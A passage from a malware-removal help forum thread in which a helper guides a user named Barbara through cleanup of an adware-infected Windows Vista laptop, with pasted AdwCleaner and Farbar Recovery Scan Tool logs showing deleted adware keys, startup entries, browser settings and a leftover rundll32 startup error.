[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\CLSID\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{95B92D92-8B7D-4A19-A3F1-43113B4DBCAF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{02F878DF-E2BE-4B85-8CB4-A0D2D4E2ED7F}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{2AF343DD-3102-4F9D-AC95-DCA4C95382C7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{3137BC14-D8D7-4B67-8FFA-2E0B2E9D541B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{4CA2AC92-971B-47B1-ACB6-357B552155AC}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{52C5395B-1FCD-47FA-A834-FD830701C2D5}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{5D3DCC39-9233-4330-94E9-DA92BE49CA1A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{615FACDF-DADB-440D-AC91-8AAB0AE9E3AD}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{762D463B-C45A-456D-A80D-8689C297C91E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{7A6BE473-7960-44D0-BD54-D23DA76353DF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{803F550E-BAAE-42BB-8917-64BA0006AB17}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{8D5BC51D-C9D3-43B9-B728-B30677B7C7E8}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{991C9D8D-A789-4DB9-BDFC-5F33398B04BF}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{A5ACC874-D943-483F-A2D1-14598D51F872}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B0474212-0D9D-4361-90B3-B89D1A44275D}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{BFDE183A-C6FE-41D2-80F9-586C29210AC2}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{D83C83BF-3EDD-4410-ADAB-5295116DD8C7}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{DD260902-9420-4055-A956-9152EB4F3E6A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{EB1F9F3C-5526-4DAE-BD4B-3EAA7715DA9F}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{F1912128-469A-4138-AA26-9699C15BB13E}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{F68DC16C-9C2B-455B-8853-7E4D34BAA3F4}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{FBA8498F-B3A0-4942-A2BF-E0CB7BC7E000}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{0510789C-5E5D-4FA3-A3EF-2D56FDE5090A}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{934063FB-A81D-4849-B02C-478446DF3219}
[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{B34A6A15-1F6F-4A19-A9DD-8B44C874A20B}
[!] Key Not Deleted : HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{5297E905-1DFB-4A9C-9871-A4F95FD58945}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{34979CB5-728D-4727-81BF-01850A3BB89B}
[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{A3866408-A46D-4421-816F-F34D7247A046}
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4}
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{D4027C7F-154A-4066-A1AD-4243D8127440}
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{83FF80F4-8C74-4B80-B5BA-C8DDD434E5C4}
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{D4027C7F-154A-4066-A1AD-4243D8127440}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{2FF49ED5-A3EF-410B-918E-97DECEB5996D}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89CC5A31-B592-4BB3-82F5-BD8ACA3E0BF0}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4E7F49ED-8C94-4AAA-A407-3010D099B11A}
[!] Key Not Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{4e7f49ed-8c94-4aaa-a407-3010d099b11a}
[!] Key Not Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{89cc5a31-b592-4bb3-82f5-bd8aca3e0bf0}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{9dffaa5f-44c6-4ff2-80ee-76368d0a2e75}
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e017ef59-8c1e-4124-bf6d-6d647d01e352}
[-] Value Deleted : HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{D4027C7F-154A-4066-A1AD-4243D8127440}]
[-] Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser [{D4027C7F-154A-4066-A1AD-4243D8127440}]
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{9C4EFBD5-1ADF-41E6-BE26-AF44326E30E4}
[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\CLSID\{A2970C7C-8392-4E6F-8B51-B763CF38E13C}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{95B92D92-8B7D-4A19-A3F1-43113B4DBCAF}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{02F878DF-E2BE-4B85-8CB4-A0D2D4E2ED7F}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{2AF343DD-3102-4F9D-AC95-DCA4C95382C7}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{3137BC14-D8D7-4B67-8FFA-2E0B2E9D541B}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{4CA2AC92-971B-47B1-ACB6-357B552155AC}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{52C5395B-1FCD-47FA-A834-FD830701C2D5}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{5D3DCC39-9233-4330-94E9-DA92BE49CA1A}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{615FACDF-DADB-440D-AC91-8AAB0AE9E3AD}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{762D463B-C45A-456D-A80D-8689C297C91E}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{7A6BE473-7960-44D0-BD54-D23DA76353DF}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{803F550E-BAAE-42BB-8917-64BA0006AB17}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{8D5BC51D-C9D3-43B9-B728-B30677B7C7E8}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{991C9D8D-A789-4DB9-BDFC-5F33398B04BF}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{A5ACC874-D943-483F-A2D1-14598D51F872}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B0474212-0D9D-4361-90B3-B89D1A44275D}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{BFDE183A-C6FE-41D2-80F9-586C29210AC2}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{D83C83BF-3EDD-4410-ADAB-5295116DD8C7}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{DD260902-9420-4055-A956-9152EB4F3E6A}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{EB1F9F3C-5526-4DAE-BD4B-3EAA7715DA9F}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{F1912128-469A-4138-AA26-9699C15BB13E}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{F68DC16C-9C2B-455B-8853-7E4D34BAA3F4}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{FBA8498F-B3A0-4942-A2BF-E0CB7BC7E000}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{0510789C-5E5D-4FA3-A3EF-2D56FDE5090A}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{934063FB-A81D-4849-B02C-478446DF3219}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B34A6A15-1F6F-4A19-A9DD-8B44C874A20B}
[!] Key Not Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{B8445FED-900C-4137-AD15-DDD2F6306B62}
[-] Key Deleted : HKCU\Software\BEFRUGAL
[-] Key Deleted : HKCU\Software\DownloadAdmin
[-] Key Deleted : HKCU\Software\SlimWare Utilities Inc
[-] Key Deleted : HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
[-] Key Deleted : HKLM\SOFTWARE\SlimWare Utilities Inc
[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Coupon Printer for Windows5.0.1.6
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{0BCE8B0A-1E76-44E5-9909-3CF804D92E4D}_is1
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{79A765E1-C399-405B-85AF-466F52E918B0}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\{eeb86aef-4a5d-4b75-9d74-f16d438fc286}
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\Coupon Printer for Windows5.0.1.6
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\CrimeWatch
[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\App Management\ARPCache\OneSystemCare
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\Software\AskToolbar
[-] Key Deleted : HKU\.DEFAULT\Software\Microsoft\Internet Explorer\SearchScopes\{9F6F6BFF-5270-44E3-8D40-0F2D89A64F42}
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com
[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\shopathome.com

***** [ Web browsers ] *****

[-] [C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\prefs.js] [Preference] Deleted : user_pref("plugin.state.npconduitfirefoxplugin", 0);

*************************

:: "Tracing" keys removed
:: Winsock settings cleared

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [11675 bytes] ##########
 


The internet connection seems all fixed now. So that's good.

However, on startup the PC always displays this error message:

------------------------------------------------------------------

RunDLL

Error loading\3\LXCYtime.dll

The specified module could not be found

-------------------------------------------------------------

FYI, it was already doing this before you helped me, ever since the initial MB scan.

Although I believe it might list different file names sometimes.


Scan with Farbar Recovery Scan Tool

Please re-run Farbar Recovery Scan Tool to give me a fresh look at your system.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.

    (XP users click run after receipt of Windows Security Warning - Open File).

  • Make sure that the Addition option is checked.
  • Press the Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.
Please include their content in your next reply.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:24-01-2016
Ran by Barbara (administrator) on BARBARA-PC (30-01-2016 12:34:53)
Running from C:\Users\Barbara\Desktop
Loaded Profiles: Barbara (Available Profiles: Barbara)
Platform: Windows Vista Home Premium Service Pack 2 (X64) Language: English (United States)
Internet Explorer Version 9 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Webroot Software, Inc. ) C:\Program Files (x86)\Webroot\WebrootSecurity\WRConsumerService.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Agere Systems) C:\Windows\System32\agr64svc.exe
(TOSHIBA) C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCameraSrv.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFProcSRVC.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\SmoothView\SmoothView.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\Teco.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe
(CyberLink) C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\rselect\RSelSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe
(Webroot Software, Inc.) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(TOSHIBA Corporation) C:\Windows\System32\ThpSrv.exe
(TOSHIBA Corporation) C:\Program Files (x86)\TOSHIBA\TOSHIBA DVD PLAYER\TNaviSrv.exe
(TOSHIBA Corporation) C:\Windows\System32\TODDSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
(Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeper.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(TOSHIBA CORPORATION) C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSwMgr.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Webroot Software, Inc. (www.webroot.com)) C:\Program Files (x86)\Webroot\WebrootSecurity\SSU.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [7220768 2009-03-12] (Realtek Semiconductor)
HKLM\...\Run: [skytel] => C:\Program Files\Realtek\Audio\HDA\Skytel.exe [1833504 2009-03-12] (Realtek Semiconductor Corp.)
HKLM\...\Run: [synTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1713448 2009-03-18] (Synaptics Incorporated)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [487264 2009-03-06] (TOSHIBA Corporation)
HKLM\...\Run: [HSON] => C:\Program Files\TOSHIBA\TBS\HSON.exe [52600 2009-03-09] (TOSHIBA Corporation)
HKLM\...\Run: [smoothView] => C:\Program Files\Toshiba\SmoothView\SmoothView.exe [518008 2008-12-18] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [900096 2009-03-23] (TOSHIBA Corporation)
HKLM\...\Run: [ThpSrv] => "C:\Windows\system32\thpsrv" /logon
HKLM\...\Run: [Teco] => C:\Program Files\TOSHIBA\TECO\Teco.exe [1451520 2009-04-14] (TOSHIBA Corporation)
HKLM\...\Run: [smartFaceVWatcher] => C:\Program Files\Toshiba\SmartFaceV\SmartFaceVWatcher.exe [236544 2009-03-24] (TOSHIBA Corporation)
HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1584184 2008-01-20] (Microsoft Corporation)
HKLM\...\Run: [TosSENotify] => C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSENotify.exe [1123840 2009-03-24] (TOSHIBA Corporation)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)
HKLM\...\Run: [LXCYCATS] => "rundll32" \3\LXCYtime.dll,RunDLLEntry
HKLM-x32\...\Run: [TUSBSleepChargeSrv] => C:\Program Files (x86)\TOSHIBA\TOSHIBA USB Sleep and Charge Utility\TUSBSleepChargeSrv.exe [252288 2009-03-27] (TOSHIBA)
HKLM-x32\...\Run: [PCMAgent] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\PCMAgent.exe [143360 2009-02-16] (CyberLink Corp.)
HKLM-x32\...\Run: [CLMLServer] => C:\Program Files (x86)\CyberLink\PowerCinema for TOSHIBA\Kernel\CLML\CLMLSvc.exe [196608 2009-02-16] (CyberLink)
HKLM-x32\...\Run: [startCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [61440 2009-04-22] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [NDSTray.exe] => C:\Program Files (x86)\TOSHIBA\ConfigFree\NDSTray.exe [304496 2009-03-17] (TOSHIBA CORPORATION)
HKLM-x32\...\Run: [TWebCamera] => C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2513472 2009-04-16] (TOSHIBA)
HKLM-x32\...\Run: [spySweeper] => C:\Program Files (x86)\Webroot\WebrootSecurity\SpySweeperUI.exe [6515784 2009-11-06] (Webroot Software, Inc.)
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2014-11-18] (Google Inc.)
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\...\MountPoints2: {78e8348c-a981-11e4-be0a-001e33cd3101} - F:\LaunchU3.exe -a

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: 0.0.0.1    mssplus.mcafee.com
Tcpip\Parameters: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{0D4D3689-2B0A-4854-86AC-74893CC38CA5}: [DhcpNameServer] 192.168.1.254

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com/ig/redirectdomain?brand=TSHB&bmod=TSHB
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://att.yahoo.com/
HKU\S-1-5-21-3355649212-3080085010-2879840853-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://search.us.com/?guid={E21F1955-857E-42DF-B279-D58E6B168B3C}
SearchScopes: HKLM -> DefaultScope {C24898BE-DF94-459B-96E9-3B0EA8BD61C1} URL =
SearchScopes: HKLM -> OldSearch URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL = hxxp://www.google.com/search?sourceid=ie7&q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&rlz=1I7TSHB
SearchScopes: HKLM-x32 -> {7CC94BCA-8E5E-4FAD-ACE5-798C208642BC} URL = hxxp://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&ie={inputEncoding}&oe={outputEncoding}&startIndex={startIndex?}&startPage={startPage}
SearchScopes: HKU\.DEFAULT -> DefaultScope {67A2568C-7A0A-4EED-AECC-B5405DE63B64} URL =
SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> {61C6D6B3-6D52-43B0-BD8F-D5AA7A1E923E} URL = hxxp://search.yahoo.com/search?p={searchTerms}&fr=tightropetb&type=11569
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
BHO-x32: Lexmark Toolbar -> {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -> C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] ()
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27] (Adobe Systems Incorporated)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corp.)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-04-01] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Lexmark Toolbar - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} - C:\Program Files\Lexmark Toolbar\toolband.dll [2006-01-25] ()
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\.DEFAULT -> No Name - {1017A80C-6F09-4548-A84D-EDD6AC9525F0} -  No File
Toolbar: HKU\.DEFAULT -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)
Toolbar: HKU\S-1-5-21-3355649212-3080085010-2879840853-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-12-26] (Google Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441
FF DefaultSearchEngine.US: Default
FF SelectedSearchEngine: Default
FF Homepage: hxxp://searchinterneat-a.akamaihd.net/h?eq=U0EeCFZVBB8SRghGI10AUlsSGRgWeA8NTA0QF1cOIV9dUxQTQ1FBJg4LBVtEEAQFIk0FA18DB0VXfWFoKB8fHGZGIUtbCW4UQ35NL04=
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-20] ()
FF Plugin-x32: @google.com/npPicasa2,version=2.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa2.dll [2008-08-20] (Google, Inc.)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Picasa2\npPicasa3.dll [2015-02-13] (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\dtplugin\npDeployJava1.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.25.2 -> C:\Program Files (x86)\Java\jre1.8.0_25\bin\plugin2\npjp2.dll [2014-12-06] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-11] (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\browser\plugins\npMozCouponPrinter.dll [2015-05-18] (Coupons, Inc.)
FF SearchPlugin: C:\Users\Barbara\AppData\Roaming\Mozilla\Firefox\Profiles\zag2l1iz.default-1433517846441\searchplugins\default.xml [2016-01-30]
